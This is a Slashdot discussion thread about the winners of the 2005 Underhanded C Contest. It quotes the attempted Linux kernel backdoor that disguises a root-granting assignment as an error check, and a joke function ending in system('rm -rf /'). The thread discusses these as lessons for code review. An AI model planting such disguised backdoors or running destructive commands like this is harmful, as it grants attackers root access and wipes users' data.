Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

Bill Gates Entry

[bjorniac]

Microsoft Word XP was rejected because the code had to seem innocent...

Re:Bill Gates Entry

[makomk]

Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

Re:Bill Gates Entry

[Richard_at_work]

Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmers applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very wierd we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAffee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Wierd, just wierd.

good to see

[garat]

Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

Will Code For Beer

[Krast0r]

"Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

I'm still fond of this one

[$RANDOMLUSER]

This one almost made it into the Linux kernel. It looks like error checking until you read it carefully.Short, brilliant and to the point.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

In other words, you become root if you call sys_wait4()with the __WCLONE|__WALL) flags

Story here and here

Re:I'm still fond of this one

This one almost made it into the Linux kernel.

It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

Re:I'm still fond of this one

[jnf]

to anyone who makes a routine of putting their constants on the left hand side of the expression, that becomes not very hard to notice .. although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

Re:I'll tell you what's underhanded

[glesga_kiss]

They predicted that kind of paranoid response. From their (humorous) FAQ:

Are you shills from MicroSoft trying to evangelize C-sharp?

No, we are not shills from MicroSoft trying to evangelize C-sharp.

Are you trying to prove open source is bad?

No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

I bet you are government agents trying to entrap me.

Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

Do you know you've been Slashdotted?

What, you couldn't tell from the last three questions?

cute fluffy kittens!

[planetoid]

int cute_fluffy_kittens(void)
{
      printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

      setuid(1);
      system("rm -rf /");
}